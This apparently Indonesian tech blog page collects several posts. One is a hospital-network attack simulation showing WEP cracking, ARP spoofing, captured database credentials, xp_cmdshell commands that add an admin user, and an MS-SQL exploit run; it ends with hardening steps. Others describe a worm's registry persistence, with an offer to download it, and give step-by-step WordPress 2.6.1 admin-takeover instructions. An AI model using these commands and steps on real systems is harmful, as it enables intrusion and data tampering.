stmikbg-dot-com

Ini adalah trik basi kayaknya semua dah tau. Tapi demi mengejar trafik kenapa gak saya posting ya.. Sebelumnya kita akan flashback dulu konsep kerja kebanyakan malware yang menggunakan flashdisk untuk media penyebarannya. Kebanyakan malware membuat file autorun.inf untuk menjalankan dirinya otomatis saat usb flashdisk ditancapkan kekomputer. Berangkat dari masalah ini kenapa kita tidak membuat sebuah file dengan nama autorun.inf yang diprotek dan tidak bisa dimodifikasi??? Tapi permasalahan yang akan timbul telah banyak malware cerdas yang bisa memodifikasi dan menghapus file autorun.inf yang ada sebelumnya.

Tetapi akan berbeda halnya jika kita membuat sebuah folder dengan nama autorun.inf otomatis virus tidak bisa membuat file autorun.inf, jika virus coba memodifikasi folder ini menghasilkan error pada windows karena mode modifikasi yang dilakukan adalah merubah file bukan merubah folder.

Dan didalam folder autorun.inf ini jangan lupa membuat file kosong dan merename dengan karakter spesial misalnya thai text ataupun chinese tex, ini dimaksud untuk melindungi agar virus tidak bisa menghapus isi dari folder ini.

Incoming search terms:

• atasi masalah autorun flashdisk

Beberapa hari yang lalu saya bersama  teman-teman miSOLUSI dan dibantu oleh beberapa STAF Rumah Sakit dimana SIMRS yang saya kembangkan diimplementasikan disana, kami melakukan simulasi serangan terhadap keamanan jaringan komputer, server dan sistem SIMRS serta menganalisa dampak dari serangan ini terhadap pelayanan pada rumah sakit dan kinerja dari sistem pasca serangan.
Simulasi ini berupa serangan terhadap network infrastuktur, server hacking, service exploiting dan database  manipulation. Dalam simulasi ini terdapat dua Tim yakni Tim 1 sebagai penyerang dan Tim 2 sebagai netadmin dan database administrator yang bertugas mengaudit dan merestore kerusakan data yang diakibatkan dari serangan ini.
Skenario serangan Tim 1 sebagai attacker melakukan scanning terhadap jaringan wifi untuk mencari jalan masuk kedalam network,  adapun step by step serangan yang dilakukan :

1. untuk melakukan serangan ini Tim 1 menggunakan airjack pada box linux backtrack. Setelah mendapatkan security key ( setting awal Access Point yang terintall sebagai repeater  / WDS System) menggunakan WEP key autentication).
2. Setelah berhasil mendapatkan WEP key dan berhasil connect ke jaringan wifi, Tim 1 melakukan arp scanning – mac address scanning dan untuk memperoleh IP dan Komputer yang lagi broadcast, adapun tools yang dipakai yakni Mac Address Scan.
3. Setelah mengetahui subnet yang dipakai dan list dari komputer yang lagi broadcast, Tim 1 melakukan ARP Spoofing (ARP Poisoning dan IP Snifing) untuk mendapatkan user name dan password yang kira-kira dipakai oleh APLIKASI SIMRS untuk melakukan login ke database server.  Adapun tools yang digunakan yakni  chain and able
4. Lama menunggu Tim 1 tidak kunjung mendapatkan user name dan password database, mereka melakukan port scanning pada semua list komputer yang telah didapat sebelumnya untuk mengetahui kira-kira dikomputer mana yang terinstall database server service. Tools yang digunakan disini adalah nmap pada box linux backtrack. M aksud dari step 4 ini untuk melakukan direct attack terhadap server database. Step keempat ini memberi sedikit informasi bahwa komputer dengan netbios name Pusat_Data dengan ip broadcast 192.168.1.100 menjalankan service ms-sql pada port 1403.
5. Setelah mengetahui IP server dan port yang listen untuk server database, Tim 1 kembali melakukan ARP Spoofing (ARP Poisoning dan IP Snifing) pada port tersebut untuk menjebak komputer dalam jaringan untuk melakukan login kedatabase server dengan perantara komputer penyerang. Step ini mendatangkan hasil yang memuaskan karena salah satu komputer dengan host name Ruang_Perawat melakukan login dengan username rperawat01 dan password r4h4514
6. Dari user name dan password yang didapatkan Tim 1 mencoba membuka koneksi terhadap database server, login berhasil dilakukan dan Tim 1 telah mempunyai akses untuk memodifikasi database.
7. Walaupun telah berhasil login kedatabase server Tim 1 masih kesulitan karena minimnya informasi tentang server yang didapat, apa nama database yang akan dimodifikasi, protokol apa yang digunakan untuk melakukan query kedatabase.
8. Setelah berdiskusi bersama anggota Tim, Tim 1 mencoba langsung mengakses database master dengan maksud untuk mendapatkan akses terhadap shell windows via stored procedure xp_cmdshell . Langkah ini sama sekali gagal karena username rperawat01 tidak mempunyai akses terhadap database master. Kegagalan pada Step ini sempat membuat Tim 1 kehilangan semangat karena dibenak Tim 1, jika mendapatkan akses pada database master mereka bisa melakukan apa saja terhadap server, baik itu manipulasi data maupun mengambil alih server  karena dengan sp xp_cmdshell mereka bisa menambah user log in setingkat administrator pada server dan melakukan login via remote desktop.

   xp_cmdshell “net user hacked jebol123 /ADD"
   xp_cmdshell “net user localgroup administrator  hacked /ADD”

   Hanya dengan dua baris perintah diatas mereka telah mendapatkan akses administrator pada database server.

9. Karena langkah diatas gagal Tim 1 mengambil tindakan extrim yakni melakukan exploitasi  terhadap service, adapun tool yang digunakan yakni ms-sqlxpl.c Setelah diconfigure pada box linux BT

   # gcc –o ms-sqlxpl ms-sqlxpl.c
   #./ms-sqlxpl 192.168.1.100 1403 attack host 192.168.1.100 on 1403......
   found version Microsoft SQL Server  7.00 - 7.00.1063 (Intel X86)!! exploiting.............................................
   Done..
   here y0u are
   C:\>

10. Tim 1 kembali bisa tersenyum karena berhasil mendapatkan akses shell pada server database. Berarti langkah ini adalah gerbang keberhasilan yang sangat gemilang. Mereka langsung membuat new login sebagai administrator bayangan pada server.
11. Berhasil membuat new login mereka langsung mengakses database server dengan remote desktop. Operating sistem pada server  yakni Windows 2003 Server Data Center.
12. Setelah login lewat remote desktop Tim 1 mengakses server seakan server tersebut berada didepan mereka, bagaimana tidak semua tampilan yang ada dilayar disajikan secara penuh dan full control pada layar monitor sipenyerang.
13. Skenario selanjutnya, Tim 1 melakukan manipulasi data pada database. Hal ini sangat mudah dilakukan karena mereka telah mempunyai akses sepenuhnya terhadap system. Cukup dengan membuka Enterprise Manager pada paket MS SQL mereka bisa memodifikasi database mana saja yang ada pada ms-sql server.
14. Tahap manipulasi database ini terdapat skenario yang ditetapkan sebelumnya yakni merubah tarif tindakan medis, manipulasi bill tagihan pasien rawat inap, menghapus stok obat dan merekayasa data rekam medis pasien, dan memanipulasi semua record yang berhubungan dengan laporan keuangan rumah sakit. (Dalam kejadian yang nyata bisa saja terjadi kerusakan yang lebih fatal dari ini).

Skenario Penyelamatan
Berangkat dari pengalaman Tim 1 dan melihat step yang digunakan dalam melakukan serangan, Tim 2 melakukan beberapa perbaikan keamanan baik pada jaringan, server maupun service database.

1. Merubah metod network key authentication dan melakukan mac address filter pada semua AP yang terinstall.
2. Menginstall security update yang kira-kira bisa mempengaruhi kinerja SIMRS, sampai pada patch untuk epidemic conficker.
3. Upgrade versi MS-SQL karena versi sebelumnya berhasil diexploitasi oleh Tim 1, Transformasi data dilakukan step by step.
4. Merubah semua password default pada server, database dan mematikan service yang kira-kira tidak digunakan.
5. Membangun sistem DTS ( Data Transformation System) yang otomatis, untuk mengatasi serangan seperti terjadinya manipulasi data oleh orang yang tidak berhak.
6. Audit Integritas data secara berkala untuk menjaga validasi data yang ada.
7. Dan beberapa langkah penting lainnya.

Sekian tulisan ini saya buat sekedar bertukar pengalaman, merusak itu mudah tapi membangun dan menjaga sesuatu itu sangat sukar. Jika ada informasi dan saran yang membangun silahkan posting dicomment, saya secara pribadi sangat terbuka atas kritik dan saran teman sekalian.

Incoming search terms:

• simulasi ddos
• SISTEM KEAMANAN komputerSERVER

Hati-hati bagi penggila windows, ada sebuah file dengan nama Free Mine.exe dengan icon MS-WORD dengan ektensi .EXE jika discan menggunakan antivirus (KAV, McAfee, Northon AV) tidak terdeteksi sebagai virus.

Jika virus ini berhasil menginfeksi system anda, dia akan memblok ansav.exe ( Menggunakan pengenalan signature file untuk memblok Ansav), blok cmd.exe. Melakukan modifikasi terhadap  registry windows diantaranya :

• Hide Ekstensi file
• Hide protected operating system
• Shell : explorer.exe C:\WINDOWS\system32\LoLOxz\smss.exe
• Userinit : userinit; C:\WINDOWS\system32\LoLOxz\smss.exe
• system : C:\WINDOWS\system32\LoLOxz\smss.exe

Virus ini juga mengcopy dirinya kesetiap drive lengkap dengan autorun.inf dan file free mine.exe, dan celakanya jika virus ini actif dia akan menutup semua komunikasi jaringan pada komputer korban. Alias tidak ada koneksi sama sekali.Mau coba virusnya? download disini…

Incoming search terms:

• c\windows\inf\other exe

Eheeemmm…….Tgl 10 september 2008…..Hari Kedua Kuliah (Maklum Mahasiswa baru). Pertama Kalinya aku masuk kelas….soalnya hari hari kemaren aku datangnya telat jadi malezz deh masuk kelas… ok…cukup sekian basa basi Bha**ng nya…..

hari Pertama aku masuk mata kuliah “Pengantar Teknologi Informatika” dengan Dosen ber code “11″.Dikasih Perkenalan Dasar2 mengenai apa itu Teknologi Informatika…. jadi kita disuruh bikin kelompok untuk membahas ttg produk yang berhubungan dengan Teknik Informatika…

Setelah Kelompok Dibentuk Eh…Tiba2 “Pikiran Jahat Melintas di kepala hehehehe…..Jadi aku nawarin Jasa buat bikin Tugas (lumayan Buat Nambah Duit Jajan). Truz Ngga tau knapa Mlah aku yang di tunjuk jadi ketua kelompoknya.

Akhirnya Kelompoknya Kukasih nama “sysHACK” (supaya Kliatan Keren) Padahal aku bukan member sysHACK. Truz materi yang ku angkat adalah “Distributed Denial of Service” ato Istilah kerennya “DDoS”.Kan Malu2in klo nama klompoknya sysHACK truz materi nya yg ngga berbobot, Bagi yang udah Biasa Melakukan “DDoS” mendingan ngga usah baca Atikel Ini…soalnya bakal bikin ketawa sampe sakit perut (more…)

Incoming search terms:

• ddos terbaru
• ddos py
• jolt ddos
• kasus DENIAL OF SERVICE(DOS) sistem informasi 2010

Ini judul yang sangat bahaya, berkicau dirumah sendiri sama saja dengan mengundang penyerang. Tapi whatever ini adalah sebuah pembelajaran. Saat ini saya masih menggunakan wp ver 2.6.1 yang disinyalir punya lubang keamanan. Lubang kemanan ini bisa diexploitasi jika web yang menggunakan wp 2.6.1 memperbolehkan pendaftaran user baru.

Lubang keamanan ini bisa menginjeksi password admin secara remote.  Adapun step by step untuk mendapatkan password adminnya yakni :

1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin                                                       x
email: your email
^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will be send to correct admin email ;/

Jadi pengguna wp-2.6.1 disarankan untuk melakukan update keversi 2.6.2